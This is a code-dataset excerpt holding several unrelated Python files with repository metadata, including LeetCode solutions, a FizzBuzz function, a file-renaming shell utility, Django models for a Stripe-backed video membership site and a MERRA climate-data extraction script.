blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
55d298950c7d7ca21de4fa38f72dc8b508087211 | 93db4b48741ff4ab0a3895813a6c7543e01821ea | /leetcode/Python/884_decoded_str.py | 436b4076dfc4d56b8920181fbd41bd1e380db873 | [] | no_license | shubham14/Coding_Contest_solutions | f884c458d3316bdafc6f1b1a52cf3e962c58bc47 | 1b67497f35b892c25e3d9600214fa37a738ffd40 | refs/heads/master | 2021-06-22T13:34:10.581101 | 2019-10-09T02:56:01 | 2019-10-09T02:56:01 | 131,326,516 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,125 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Aug 11 19:42:57 2018
@author: Shubham
"""
import math
class Solution:
    """Grab-bag of independent LeetCode-style exercises."""

    def maxArea(self, A, B, C, D, E, F, G, H):
        """Total area covered by two axis-aligned rectangles.

        (A, B)-(C, D) and (E, F)-(G, H) are the bottom-left / top-right
        corners of the two rectangles; overlap is counted once.
        """
        areaSum = (C - A) * (D - B) + (G - E) * (H - F)
        # Disjoint: one rectangle lies entirely left/right/above/below the other.
        if E >= C or A >= G or B >= H or F >= D:
            return areaSum
        # Corners of the intersection rectangle.
        bX = max(A, E)
        bY = max(B, F)
        tX = min(C, G)
        tY = min(D, H)
        return areaSum - (tX - bX) * (tY - bY)

    def minSquare(self, n):
        """Least number of perfect squares summing to n (level-order BFS).

        Returns 0 for n <= 0 (the original looped forever for n == 0).
        """
        if n <= 0:
            return 0
        squares = [i * i for i in range(1, int(math.sqrt(n)) + 1)]
        level = 0
        current = [0]
        while current:
            nxt = set()
            for a in current:
                for b in squares:
                    s = a + b
                    if s == n:
                        return level + 1
                    if s < n:
                        nxt.add(s)
            current = list(nxt)
            level += 1
        return 0

    def rev_str(self, str1, st, end):
        """Reverse str1[st..end] in place (str1 is a list); returns str1."""
        while st <= end:
            str1[st], str1[end] = str1[end], str1[st]
            st += 1
            end -= 1
        return str1

    def rev_sent(self, sent):
        """Reverse the letters of each word, keeping word order.

        Returns a list of characters, as the original did.
        BUG FIX: the original guarded the per-word reversal with
        `start != end`, which was never true (neither variable was ever
        advanced), so the loop did nothing and the final call reversed the
        whole sentence instead of just the last word.
        """
        sent = list(sent)
        start = 0
        for i, ele in enumerate(sent):
            if ele == ' ':
                self.rev_str(sent, start, i - 1)
                start = i + 1
        self.rev_str(sent, start, len(sent) - 1)
        return sent
class MinStack:
    """Stack with push/pop/top plus O(1) retrieval of the minimum element.

    NOTE(review): two latent bugs, left as-is and documented for follow-up:
      * the index attribute ``self.top`` set in ``__init__`` shadows the
        ``top()`` method on instances, so ``obj.top()`` raises TypeError;
      * only one previous minimum (``next_minEle``) is remembered, so after
        popping two successive minima ``getMin`` can report a stale value.
    """

    def __init__(self):
        self.min_stack = []        # backing storage
        self.top = -1              # index of the current top element
        self.minEle = 1000000      # current minimum ("infinity" sentinel)
        self.next_minEle = 999999  # minimum seen before the current one

    def push(self, x):
        # Append and keep the running minimum up to date.
        self.min_stack.append(x)
        self.top += 1
        if x < self.minEle:
            self.next_minEle = self.minEle
            self.minEle = x

    def pop(self):
        # If the popped element is the minimum, fall back to the previous one.
        if self.min_stack[self.top] == self.minEle:
            self.minEle = self.next_minEle
        self.min_stack.pop()
        self.top -= 1

    def top(self):
        # Peek at the top element (shadowed by the attribute of the same name).
        return self.min_stack[self.top]

    def getMin(self):
        # O(1) minimum of the current stack contents.
        return self.minEle
"shubham.ddash@gmail.com"
] | shubham.ddash@gmail.com |
def checkio(number: int) -> str:
    """Classic Fizz Buzz.

    Returns 'Fizz Buzz' for multiples of 15, 'Fizz' for multiples of 3,
    'Buzz' for multiples of 5, otherwise the number as a string.
    The original re-tested both divisibility conditions in every branch;
    an ordered cascade makes the redundant checks unnecessary.
    """
    if number % 15 == 0:
        return 'Fizz Buzz'
    if number % 3 == 0:
        return 'Fizz'
    if number % 5 == 0:
        return 'Buzz'
    return str(number)
# Smoke checks covering all four branches (both, 3-only, 5-only, neither).
print(checkio(15))
print(checkio(6))
print(checkio(5))
print(checkio(7))
"a58982284@163.com"
] | a58982284@163.com |
9b8122ee97bc2012e154cd33cd099e61ed67ab7b | de88a649182d42206358e53bba69252e04d8a69f | /abc_py/abc168/c.py | b616070660aef9a02ea101c6794186568462f0ec | [] | no_license | aki-nasu/competition | 47b05312d9b19dcf62212570d6253ec7a109382d | 9edb02abb14d896932f08218417d3f10b54f1755 | refs/heads/master | 2021-06-22T22:09:14.433407 | 2021-06-06T06:53:42 | 2021-06-06T06:53:42 | 225,662,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | import math
a,b,h,m = map(int,input().split())
ra = h * 30 + m * 0.5
rb = m * 6
r = math.radians(abs(ra-rb))
# (abs(ra-rb)*math.pi)/180
print(math.sqrt(a**2 + b**2 - 2*a*b*math.cos(r)))
| [
"t.t.akiyoshi2@gmail.com"
] | t.t.akiyoshi2@gmail.com |
9325ce23a6bcefeac701f51d38d1513df3b719a6 | 814f8b85dd6435b3bb3fdebf2f193912aa145a62 | /image_segmentation/CycleGAN/__init__.py | b7901d30d6a0433aae360a3b18a7d65798dcb49b | [
"Apache-2.0"
] | permissive | jacke121/pycharm | 480df86258ee918de25b76a4156e9e6b9d355df7 | b9b2963cf0c5028f622f41413f52f1b5cbde28a1 | refs/heads/master | 2020-03-18T16:35:25.579992 | 2018-01-01T02:30:58 | 2018-01-01T02:30:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by weihang huang on 17-12-10
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
import os
# Absolute path of this package's parent directory, with a trailing slash.
root = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + '/'
| [
"614047311@qq.com"
] | 614047311@qq.com |
389ab210334c512ad944a1569f96a0cfda9fea26 | 3482beb24c0635efcb60391d27c1987b7fb413a5 | /kvipytools/kvipytools/rename.py | cce6f4b4865c27f1c76dac3edfdbb3d77e504d17 | [] | no_license | rpgplanet/rpgplanet-all | ad2e6a00935d2b214ba41b4adced524f1bd443db | 6d473369cd8263f59ebcbf7f812fd4d34d4d785e | refs/heads/master | 2021-01-13T01:43:58.718833 | 2010-10-28T10:25:01 | 2010-10-28T10:25:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,987 | py | #!/usr/bin/env python
import sys, os
class OptionParser(object):
    """Parse ``old=new`` pairs given on the command line.

    The separator (default ``=``) can be escaped with the escape character
    (default ``\\``), and the escape character escapes itself, e.g.::

        ./rename.py a=b c=d "a a a=b b b" a\\==\\=b

    yields::

        [('a', 'b'), ('c', 'd'), ('a a a', 'b b b'), ('a=', '=b')]
    """

    def __init__(self, escape_char='\\', escape_replacement=-1, splitter_char='=', splitter_replacement=-2):
        self.escape_char = escape_char
        self.escape_replacement = escape_replacement
        self.splitter_char = splitter_char
        self.splitter_replacement = splitter_replacement

    def split_string(self, string):
        """Explode a string into a list of its characters."""
        return list(string)

    def replace_pair(self, chars, pair, replacement):
        """Scan *chars* left to right, substituting *replacement* for every
        non-overlapping occurrence of the two-character *pair*."""
        out = []
        pos = 0
        size = len(chars)
        while pos < size:
            if pos + 1 < size and (chars[pos], chars[pos + 1]) == pair:
                out.append(replacement)
                pos += 2
            else:
                out.append(chars[pos])
                pos += 1
        return out

    def escape_escape(self, chars):
        """Collapse doubled escape characters into a placeholder."""
        return self.replace_pair(
            chars, (self.escape_char, self.escape_char), self.escape_replacement)

    def escape_split(self, chars):
        """Collapse escaped separators into a placeholder."""
        return self.replace_pair(
            chars, (self.escape_char, self.splitter_char), self.splitter_replacement)

    def split_via_equalsign(self, chars, splitter='='):
        """Split at the first (unescaped) separator character."""
        cut = chars.index(splitter)
        return (chars[:cut], chars[cut + 1:])

    def list_replace_all(self, seq, obj, repl):
        """In-place: replace every occurrence of *obj* in *seq* with *repl*."""
        for pos in range(len(seq)):
            if seq[pos] == obj:
                seq[pos] = repl

    def __call__(self, opts):
        """
        parse options given on cmdline separated by equal sign:
        >>> OptionParser()(['a=b', 'x x x=y y y'])
        [('a', 'b'), ('x x x', 'y y y')]
        """
        parsed = []
        for raw in opts:
            # Neutralise escapes, split, then restore the literal characters.
            chars = self.escape_split(self.escape_escape(raw))
            left, right = self.split_via_equalsign(chars)
            for half in (left, right):
                self.list_replace_all(half, self.splitter_replacement, self.splitter_char)
                self.list_replace_all(half, self.escape_replacement, self.escape_char)
            parsed.append((''.join(left), ''.join(right)))
        return parsed
def call_command(cmd, options, verbose=False):
"""
helper function that call shell command for every tuple in options
"""
for patrn, repl in options:
repl = {'patrn': patrn, 'repl': repl,}
command = cmd % repl
print 'running: %s' % command
if not verbose:
command += '&>/dev/null'
os.system(command)
def rename_files_dirs(options):
    """Mirror the directory tree under substituted names, move every file
    across, then prune the directories that were left empty."""
    mkdir_cmd = '''find . -type d | while read f; do mkdir -p "$(echo $f | sed 's/%(patrn)s/%(repl)s/g')"; done'''
    move_cmd = '''find . -type f | while read f; do mv "$f" "$(echo $f | sed 's/%(patrn)s/%(repl)s/g')"; done'''
    prune_cmd = '''find -depth -type d -empty -exec rmdir {} \;'''
    # create dirs first
    call_command(mkdir_cmd, options)
    # than move files
    call_command(move_cmd, options)
    # delete empty dirs (dummy option tuple: the template has no placeholders)
    call_command(prune_cmd, [(1, 1)])
def change_content(options):
    """
    take file by file and replace any occurence of pattern with its replacement
    """
    # grep -r -l lists every file containing the pattern; the filenames are
    # NUL-joined (tr) so xargs -0 can hand them safely to in-place sed.
    call_command('''grep -r -l -- '%(patrn)s' . | tr '\\n' '\\0' | xargs -0 sed -i "s/%(patrn)s/%(repl)s/g"''', options)
def main(argv=None):
    """Entry point: parse ``old=new`` pairs from *argv* (defaulting to
    ``sys.argv[1:]``), rename files/directories, then rewrite contents."""
    if argv is None:
        argv = sys.argv[1:]
    parse_options = OptionParser()
    # BUG FIX: previously re-read sys.argv[1:] here, silently ignoring the
    # *argv* parameter (which made main() untestable with explicit args).
    options = parse_options(argv)
    rename_files_dirs(options)
    change_content(options)
# Allow use both as an importable module and as a command-line script.
if __name__ == '__main__':
    main()
| [
"bugs@almad.net"
] | bugs@almad.net |
30cb098c7657866cc84531411b8c6256998523ed | 3a5ad075884d55593464f97df758de1891bfd3f2 | /all_Gryzinski/BDE_model.py | 6affdeb9cf80c7abc20558e4776bbe0101198979 | [] | no_license | fedorsidorov/DEBER-Simulation-2.0 | 1a812e950749cf86e8e0dbd4d3514fc58f710e9a | eca39922df628ca6dcfbfb2af61aaa469fe66074 | refs/heads/master | 2022-04-26T13:23:24.262182 | 2020-04-24T23:43:12 | 2020-04-24T23:43:12 | 202,705,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,527 | py | #%% Import
import numpy as np
import os
import importlib
import matplotlib.pyplot as plt
import copy
import my_constants as mc
mc = importlib.reload(mc)
import E_loss_functions as elf
elf = importlib.reload(elf)
os.chdir(mc.sim_folder + 'all_Gryzinski')
#%%
# Bond-dissociation energies of the MMA monomer:
# bond name -> (bond energy in eV, number of electrons in such bonds).
MMA_bonds = {}
#kJmol_2_eV = 1e+3 / (mc.Na * mc.eV)
# Rounded value of the kJ/mol -> eV conversion commented out above.
kJmol_2_eV = 0.0103
MMA_bonds['Op-Cp'] = 815 * kJmol_2_eV, 8
MMA_bonds['O-Cp'] = 420 * kJmol_2_eV, 4
MMA_bonds['H-C3'] = 418 * kJmol_2_eV, 12
MMA_bonds['H-C2'] = 406 * kJmol_2_eV, 4
MMA_bonds['Cp-Cg'] = 383 * kJmol_2_eV, 2
MMA_bonds['O-C3'] = 364 * kJmol_2_eV, 4
MMA_bonds['C-C3'] = 356 * kJmol_2_eV, 2
MMA_bonds['C-C2'] = 354 * kJmol_2_eV, 4
# (E_bond, N_el) rows for every bond, in insertion order.
Eb_Nel = np.array(list(MMA_bonds.values()))
#%%
def get_stairway(b_map_sc):
    """For each energy in mc.EE, the fraction of accessible bond electrons
    that belong to the bonds selected in *b_map_sc* (a dict whose keys name
    entries of MMA_bonds).  Returns an array aligned with mc.EE.
    """
    # (E_bond, N_el) rows for the selected bonds only,
    # e.g. b_map_sc = dict([('C-C2', 4)]).
    selected = np.array([[MMA_bonds[name][0], MMA_bonds[name][1]]
                         for name in b_map_sc.keys()])
    probs = np.zeros(len(mc.EE))
    nums = np.zeros(len(mc.EE))
    dens = np.zeros(len(mc.EE))
    for i, e in enumerate(mc.EE):
        # Electrons of the selected bonds that are accessible at energy e.
        num = sum(row[1] for row in selected if e >= row[0])
        if num == 0:
            continue
        nums[i] = num
        # All accessible bond electrons at energy e.
        den = sum(row[1] for row in Eb_Nel if e >= row[0])
        dens[i] = den
        probs[i] = num / den
    return probs
#%%
# Reference curves computed from Dapor's dielectric-response data.
PMMA_total_inel_U = np.load(mc.sim_folder + 'E_loss/diel_responce/Dapor/PMMA_U_Dapor.npy')
#PMMA_diff_inel_U = np.load(mc.sim_folder +\
#                           'E_loss/diel_responce/Dapor/PMMA_diff_U_Dapor_Ashley.npy')
PMMA_SP = np.load(mc.sim_folder + 'E_loss/diel_responce/Dapor/PMMA_SP_Dapor.npy')
#%% Go Fryzinski
# Total inverse mean free path (U) and stopping power (SP) summed over all
# MMA bonds with Gryzinski cross-sections.
total_U = np.zeros(len(mc.EE))
total_SP = np.zeros(len(mc.EE))
for bond in MMA_bonds:
    total_U += elf.get_Gryzinski_CS(mc.EE, MMA_bonds[bond][0]) * MMA_bonds[bond][1] * mc.n_PMMA_mon
    total_SP += elf.get_Gryzinski_SP(mc.EE, MMA_bonds[bond][0], mc.n_PMMA_mon, MMA_bonds[bond][1])
#%% U
# Compare Dapor's U against the Gryzinski+BDE total.
plt.loglog(mc.EE, PMMA_total_inel_U, label='Dapor')
plt.loglog(mc.EE, total_U, label='Gryzinski + BDE')
plt.title('PMMA Dapor and Gryz+BDE U')
plt.xlabel('E, eV')
plt.ylabel('U, cm$^{-1}$')
plt.legend()
plt.grid()
#plt.savefig('PMMA_Dapor_Gryz+BDE_U.png', dpi=300)
#%% SP
# Same comparison for the stopping power.
plt.loglog(mc.EE, PMMA_SP, label='Dapor')
plt.loglog(mc.EE, total_SP, label='Gryzinski + BDE')
plt.xlabel('E, eV')
plt.ylabel('SP, eV/cm')
plt.legend()
plt.grid()
#plt.savefig('PMMA_Dapor_Gryz+BDE_SP.png', dpi=300)
#%% Gryzinski stairway
# Per-bond Gryzinski U curves, one row per bond in MMA_bonds order.
gryz_bond_U = np.zeros((len(MMA_bonds), len(mc.EE)))
for i in range(len(MMA_bonds)):
    gryz_bond_U[i, :] = elf.get_Gryzinski_CS(mc.EE, MMA_bonds[list(MMA_bonds.keys())[i]][0]) *\
        MMA_bonds[list(MMA_bonds.keys())[i]][1] * mc.n_PMMA_mon
    plt.loglog(mc.EE, gryz_bond_U[i, :], label=list(MMA_bonds.keys())[i])
plt.title('PMMA Dapor and Gryz+BDE bond CS for each bond')
plt.xlabel('E, eV')
plt.ylabel('U, cm$^{-1}$')
plt.ylim(1e+5, 1e+8)
plt.legend()
plt.grid()
#plt.savefig('PMMA_Dapor_Gryz+BDE_U_bonds.png', dpi=300)
#%%
def get_w_scission(EE):
    """Scission probability versus electron energy.

    For each energy in *EE* (eV) returns the ratio of the 4 chain C-C bond
    electrons to the number of bond electrons whose dissociation energy lies
    below that energy, and 0 below the lowest bond threshold.  Thresholds
    are the BDE values (kJ/mol) times the 0.0103 kJ/mol->eV factor used
    throughout this script.
    """
    # Start from the high-energy plateau (all 40 electrons accessible) and
    # overwrite downward, threshold by threshold.  (The original also had a
    # dead `result = np.zeros(len(EE))` immediately overwritten - removed.)
    result = np.ones(len(EE)) * 4/40
    result[np.where(EE < 815 * 0.0103)] = 4/(40 - 8)
    result[np.where(EE < 420 * 0.0103)] = 4/(40 - 8 - 4)
    result[np.where(EE < 418 * 0.0103)] = 4/(40 - 8 - 4 - 12)
    result[np.where(EE < 406 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4)
    result[np.where(EE < 383 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4 - 2)
    result[np.where(EE < 364 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4 - 2 - 4)
    result[np.where(EE < 356 * 0.0103)] = 4/(40 - 8 - 4 - 12 - 4 - 2 - 4 - 2)
    result[np.where(EE < 354 * 0.0103)] = 0
    return result
probs_easy = get_w_scission(mc.EE)
#%%
# Stairway restricted to the two chain (C-C) bonds only.
new_probs_easy = get_stairway({'C-C2': 4, 'C-C3': 2})
#%%
# Scission probability from the per-bond Gryzinski curves: weight of the
# last two rows (the C-C bonds) in the total at each energy.
probs = np.zeros(len(mc.EE))
for i in range(len(probs)):
    if np.sum(gryz_bond_U[:, i]) == 0:
        continue
    probs[i] = np.sum(gryz_bond_U[-2:, i]) / np.sum(gryz_bond_U[:, i])
# Plot the three estimates over the low-energy range.
end_ind = 200
plt.plot(mc.EE[:end_ind], probs_easy[:end_ind], label='basic')
plt.plot(mc.EE[:end_ind], new_probs_easy[:end_ind], label='new basic')
plt.plot(mc.EE[:end_ind], probs[:end_ind], label='Gryzinsky')
plt.title('Scission probability')
plt.xlabel('E, eV')
plt.ylabel('p')
plt.legend()
plt.grid()
#plt.savefig('scission_probs.png', dpi=300)
| [
"fedor.sidorov.92@yandex.ru"
] | fedor.sidorov.92@yandex.ru |
b0788388960b10b9cc402064bdf16311c76adf2a | 9ce0d602404b2329dfb36a0ae31b43dd1865d76d | /app/models.py | d9f118e64dfe4d21fefde1ec1ff4885190fe0e26 | [] | no_license | haruyasu/django-video-membership | 0cf40e6c2d28bbbc1c4c608df378a163b83f1654 | 87b8a0c4b3b12c4b901303bd2c6ee078069ba167 | refs/heads/main | 2023-01-01T18:39:13.697284 | 2020-10-25T10:59:41 | 2020-10-25T10:59:41 | 305,915,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,721 | py | from django.db import models
from django.conf import settings
from django.db.models.signals import pre_save, post_save
from django.contrib.auth.signals import user_logged_in
from django.utils.text import slugify
from django.shortcuts import reverse
from django.contrib.auth import get_user_model
from allauth.account.signals import email_confirmed
import stripe
stripe.api_key = settings.STRIPE_SECRET_KEY
User = get_user_model()
class Pricing(models.Model):
    """A purchasable subscription tier, mirrored by a Stripe Price."""
    name = models.CharField(max_length=100) # Basic / Pro / Premium
    slug = models.SlugField()
    # Stripe Price identifier used when creating subscriptions.
    stripe_price_id = models.CharField(max_length=100)
    price = models.IntegerField()  # NOTE(review): currency unit not shown here

    def __str__(self):
        return self.name
class Subscription(models.Model):
    """Links a user to a Pricing tier and caches the Stripe subscription state."""
    user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    pricing = models.ForeignKey(Pricing, on_delete=models.CASCADE, related_name='subscriptions')
    created = models.DateTimeField(auto_now_add=True)
    stripe_subscription_id = models.CharField(max_length=50)
    # Raw Stripe status string, e.g. "active", "trialing", "canceled".
    status = models.CharField(max_length=100)

    def __str__(self):
        return self.user.email

    @property
    def is_active(self):
        # Trialing subscriptions count as active for access control.
        return self.status == "active" or self.status == "trialing"
class Course(models.Model):
    """A video course, visible to subscribers of any tier in pricing_tiers."""
    pricing_tiers = models.ManyToManyField(Pricing, blank=True)
    name = models.CharField(max_length=100)
    slug = models.SlugField(unique=True)
    thumbnail = models.ImageField(upload_to="images")
    description = models.TextField()

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Canonical URL, resolved by the "course-detail" route.
        return reverse("course-detail", kwargs={"slug": self.slug})
class Video(models.Model):
    """A single lesson within a Course, hosted on Vimeo."""
    course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name='videos')
    vimeo_id = models.CharField(max_length=50)
    title = models.CharField(max_length=150)
    slug = models.SlugField(unique=True)
    description = models.TextField()
    order = models.IntegerField(default=1)  # position within the course

    class Meta:
        ordering = ["order"]

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        # Canonical URL, resolved by the "video-detail" route.
        return reverse("video-detail", kwargs={
            "video_slug": self.slug,
            "slug": self.course.slug
        })
def pre_save_course(sender, instance, *args, **kwargs):
    # pre_save signal handler: derive the slug from the name on first save.
    if not instance.slug:
        instance.slug = slugify(instance.name)
def pre_save_video(sender, instance, *args, **kwargs):
    # pre_save signal handler: derive the slug from the title on first save.
    if not instance.slug:
        instance.slug = slugify(instance.title)
def post_email_confirmed(request, email_address, *args, **kwargs):
    """allauth ``email_confirmed`` handler: start the user's free trial.

    Creates the local Subscription, a Stripe customer, and a 7-day trial
    subscription on the hard-coded 'django-free-trial' price.
    NOTE(review): assumes a Pricing row named 'Free Trial' exists, and that
    the user model has a ``stripe_customer_id`` field - verify in the app.
    """
    user = User.objects.get(email=email_address.email)
    free_trial_pricing = Pricing.objects.get(name='Free Trial')
    subscription = Subscription.objects.create(
        user=user,
        pricing=free_trial_pricing
    )
    stripe_customer = stripe.Customer.create(
        email=user.email
    )
    stripe_subscription = stripe.Subscription.create(
        customer=stripe_customer["id"],
        items=[{'price': 'django-free-trial'}],
        trial_period_days=7
    )
    subscription.status = stripe_subscription["status"] # trialing
    subscription.stripe_subscription_id = stripe_subscription["id"]
    subscription.save()
    user.stripe_customer_id = stripe_customer["id"]
    user.save()
def user_logged_in_receiver(sender, user, **kwargs):
    # On each login, refresh the locally cached subscription status from Stripe.
    subscription = user.subscription
    sub = stripe.Subscription.retrieve(subscription.stripe_subscription_id)
    subscription.status = sub["status"]
    subscription.save()
# Wire up the signal handlers: login refresh, trial creation on e-mail
# confirmation, and slug generation before saving courses/videos.
user_logged_in.connect(user_logged_in_receiver)
email_confirmed.connect(post_email_confirmed)
pre_save.connect(pre_save_course, sender=Course)
pre_save.connect(pre_save_video, sender=Video)
| [
"harukun2002@gmail.com"
] | harukun2002@gmail.com |
64a399c18f23c2f0509b1b87319fcf387ad2065d | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/01_netCDF_extraction/merra902TG/830-tideGauge.py | 98529851e7c0414d44337ffea9a71bbf32c354c9 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,075 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 01 10:00:00 2020
MERRAv2 netCDF extraction script - template
To create an extraction script for each tide gauge
@author: Michael Tadesse
"""
import os
import pandas as pd
from d_merra_define_grid import Coordinate, findPixels, findindx
from c_merra_read_netcdf import readnetcdf
from f_merra_subset import subsetter
def extract_data(delta= 3):
    """
    This is the master function that calls subsequent functions
    to extract uwnd, vwnd, slp for the specified
    tide gauges
    delta: distance (in degrees) from the tide gauge
    """
    # NOTE(review): per-tide-gauge template script -- the gauge index is
    # hard-coded below (x = 830, y = 831); a generator presumably stamps it.
    print('Delta = {}'.format(delta), '\n')
    #defining the folders for predictors
    dir_in = "/lustre/fs0/home/mtadesse/MERRAv2/data"
    surge_path = "/lustre/fs0/home/mtadesse/obs_surge"
    csv_path = "/lustre/fs0/home/mtadesse/merraLocalized"
    #cd to the obs_surge dir to get TG information
    os.chdir(surge_path)
    tg_list = os.listdir()
    #cd to the obs_surge dir to get TG information
    os.chdir(dir_in)
    years = os.listdir()
    #################################
    #looping through the year folders
    #################################
    #to mark the first csv
    firstCsv = True;
    for yr in years:
        os.chdir(dir_in)
        #print(yr, '\n')
        os.chdir(os.path.join(dir_in, yr))
        ####################################
        #looping through the daily .nc files
        ####################################
        for dd in os.listdir():
            os.chdir(os.path.join(dir_in, yr)) #back to the predictor folder
            print(dd, '\n')
            #########################################
            #get netcdf components - predictor file
            #########################################
            # readnetcdf returns (lon, lat, time, slp, u10, v10) arrays.
            nc_file = readnetcdf(dd)
            lon, lat, time, predSLP, predU10, predV10 = \
                nc_file[0], nc_file[1], nc_file[2], nc_file[3], nc_file[4]\
                , nc_file[5]
            # Tide-gauge index range handled by this script instance.
            x = 830
            y = 831
            #looping through individual tide gauges
            for t in range(x, y):
                #the name of the tide gauge - for saving purposes
                # tg = tg_list[t].split('.mat.mat.csv')[0]
                tg = tg_list[t]
                #extract lon and lat data from surge csv file
                #print(tg, '\n')
                os.chdir(surge_path)
                if os.stat(tg).st_size == 0:
                    print('\n', "This tide gauge has no surge data!", '\n')
                    continue
                surge = pd.read_csv(tg, header = None)
                #surge_with_date = add_date(surge)
                #define tide gauge coordinate(lon, lat)
                tg_cord = Coordinate(surge.iloc[0,0], surge.iloc[0,1])
                #find closest grid points and their indices
                close_grids = findPixels(tg_cord, delta, lon, lat)
                ind_grids = findindx(close_grids, lon, lat)
                #loop through preds#
                #subset predictor on selected grid size
                predictors = {'slp':predSLP, 'wnd_u':predU10, \
                    'wnd_v':predV10}
                for xx in predictors.keys():
                    pred_new = subsetter(dd, predictors[xx], ind_grids, time)
                    # Accumulate each predictor across all days/years;
                    # firstCsv marks the very first frame of the whole run.
                    if xx == 'slp':
                        if firstCsv:
                            finalSLP = pred_new
                        else:
                            finalSLP = pd.concat([finalSLP, pred_new], axis = 0)
                            print(finalSLP.shape)
                    elif xx == 'wnd_u':
                        if firstCsv:
                            finalUwnd = pred_new
                        else:
                            finalUwnd = pd.concat([finalUwnd, pred_new], axis = 0)
                    elif xx == 'wnd_v':
                        if firstCsv:
                            finalVwnd = pred_new
                            # wnd_v is processed last, so the flag flips only
                            # after all three predictors got their first frame.
                            firstCsv = False;
                        else:
                            finalVwnd = pd.concat([finalVwnd, pred_new], axis = 0)
                #create directories to save pred_new
                os.chdir(csv_path)
                #tide gauge directory
                tg_name_old = tg.split('.mat.mat.csv')[0]
                tg_name = '-'.join([str(t), tg_name_old])
                try:
                    os.makedirs(tg_name)
                    os.chdir(tg_name) #cd to it after creating it
                except FileExistsError:
                    #directory already exists
                    os.chdir(tg_name)
                #save as csv (overwritten each day with the running totals)
                finalSLP.to_csv('slp.csv')
                finalUwnd.to_csv('wnd_u.csv')
                finalVwnd.to_csv('wnd_v.csv')
#run script
extract_data(delta= 3)
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
884b9d01cec1bf9f1ce1a06c648463cd2ddab33d | 159aed4755e47623d0aa7b652e178296be5c9604 | /data/scripts/templates/object/draft_schematic/clothing/shared_clothing_shirt_casual_04.py | 1f8fd20f134c94f5a9dd3f2bdc8e6da119d5dd5b | [
"MIT"
] | permissive | anhstudios/swganh | fb67d42776864b1371e95f769f6864d0784061a3 | 41c519f6cdef5a1c68b369e760781652ece7fec9 | refs/heads/develop | 2020-12-24T16:15:31.813207 | 2016-03-08T03:54:32 | 2016-03-08T03:54:32 | 1,380,891 | 33 | 44 | null | 2016-03-08T03:54:32 | 2011-02-18T02:32:45 | Python | UTF-8 | Python | false | false | 462 | py | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/clothing/shared_clothing_shirt_casual_04.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | [
"rwl3564@rit.edu"
] | rwl3564@rit.edu |
91965e649e25eb2201b821ce51e22d441092e675 | f7b25eaee7a19767a27f6172b87e552bcfe608ad | /apps/certification/tests.py | 42c8dfc07ad42bee54b4ddce012a3fb48cc6fc0a | [] | no_license | Mid0Riii/Psyconsole | addf280e075e29abc746b437a114d531d2e70f10 | d9540e0b4b37fdd44be0a169d3ce8cdddc2b956a | refs/heads/master | 2023-01-01T05:10:18.520481 | 2020-10-18T11:11:26 | 2020-10-18T11:11:26 | 266,294,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | from django.test import TestCase
# Create your tests here.
import qrcode
from PIL import Image, ImageDraw, ImageFont
import datetime
#
# image = Image.open('assets/cert.jpg')
#
# def get_size(image):
# #获取图像的宽和高
# width, height = image.size
# return width,height
#
# setFont = ImageFont.truetype("assets/msyh.ttf",20)
# print(get_size(image))
# draw = ImageDraw.Draw(image)
# draw.text((200,100),"测试",fill="black",font=setFont)
# image.show()
# # img = qrcode.make('http://www.baidu.com')
# # with open('test.png', 'wb') as f:
